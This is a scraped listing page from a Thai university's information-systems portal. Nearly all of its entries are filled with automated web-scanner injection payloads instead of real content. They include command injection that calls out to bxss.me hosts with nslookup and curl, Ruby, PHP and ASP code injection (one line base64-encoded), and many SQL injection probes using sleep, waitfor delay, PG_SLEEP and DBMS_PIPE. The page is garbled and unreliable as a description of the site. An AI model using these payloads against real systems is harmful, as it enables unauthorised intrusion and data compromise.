ระบบสารสนเทศ

ncMUFCMU
'+'A'.concat(70-3).concat(22*4).concat(102).concat(81).concat(120).concat(87)+(require'socket' Socket.gethostbyname('hitld'+'mbsrkqhd3971e.bxss.me.')[3].to_s)+'
รายละเอียด..
ncMUFCMU
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
รายละเอียด..
ncMUFCMU
response.write(9631548*9796753)
รายละเอียด..
ncMUFCMU
'+response.write(9631548*9796753)+'
รายละเอียด..
ncMUFCMU
"+response.write(9631548*9796753)+"
รายละเอียด..
ncMUFCMU
|(nslookup -q=cname hitznrynadruhd49f7.bxss.me||curl hitznrynadruhd49f7.bxss.me)
รายละเอียด..
ncMUFCMU
`(nslookup -q=cname hitvvvrixgavf1eeba.bxss.me||curl hitvvvrixgavf1eeba.bxss.me)`
รายละเอียด..
ncMUFCMU
;(nslookup -q=cname hithakoswcfpn6c63b.bxss.me||curl hithakoswcfpn6c63b.bxss.me)|(nslookup -q=cname hithakoswcfpn6c63b.bxss.me||curl hithakoswcfpn6c63b.bxss.me)&(nslookup -q=cname hithakoswcfpn6c63b.bxss.me||curl hithakoswcfpn6c63b.bxss.me)
รายละเอียด..
ncMUFCMU
-1 OR 2+666-666-1=0+0+0+1 --
รายละเอียด..
ncMUFCMU
-1' OR 2+753-753-1=0+0+0+1 --
รายละเอียด..
ncMUFCMU
-1' OR 2+472-472-1=0+0+0+1 or 'yv08Oe31'='
รายละเอียด..
ncMUFCMU
-1" OR 2+843-843-1=0+0+0+1 --
รายละเอียด..
ncMUFCMU
if(now()=sysdate(),sleep(15),0)
รายละเอียด..
ncMUFCMU
3137 Laguna Street0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
รายละเอียด..
ncMUFCMU
3137 Laguna Street0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
รายละเอียด..
ncMUFCMU
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
รายละเอียด..
ncMUFCMU
3137 Laguna Street-1; waitfor delay '0:0:15' --
รายละเอียด..
ncMUFCMU
3137 Laguna Street-1); waitfor delay '0:0:15' --
รายละเอียด..
ncMUFCMU
3137 Laguna Street-1 waitfor delay '0:0:15' --
รายละเอียด..
ncMUFCMU
3137 Laguna StreetS5PQj4sx'; waitfor delay '0:0:15' --
รายละเอียด..
ncMUFCMU
3137 Laguna StreetFF1vnQMq'); waitfor delay '0:0:15' --
รายละเอียด..
ncMUFCMU
3137 Laguna Street73z9JgZu')); waitfor delay '0:0:15' --
รายละเอียด..
ncMUFCMU
3137 Laguna StreetrZvvIBuH' OR 270=(SELECT 270 FROM PG_SLEEP(15))--
รายละเอียด..
ncMUFCMU
3137 Laguna StreetnwClXULa') OR 867=(SELECT 867 FROM PG_SLEEP(15))--
รายละเอียด..
ncMUFCMU
3137 Laguna Streetkcm0dDHD')) OR 612=(SELECT 612 FROM PG_SLEEP(15))--
รายละเอียด..
ncMUFCMU
3137 Laguna Street'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
รายละเอียด..
ncMUFCMU
3137 Laguna Street%2527%2522\'\"
รายละเอียด..
YRU Webs Personnel
ระบบเว็บไซต์งานการเจ้าหน้าที่
รายละเอียด..

ศูนย์รวม
ระบบสารสนเทศ


มหาวิทยาลัยราชภัฎยะลา yru.ac.th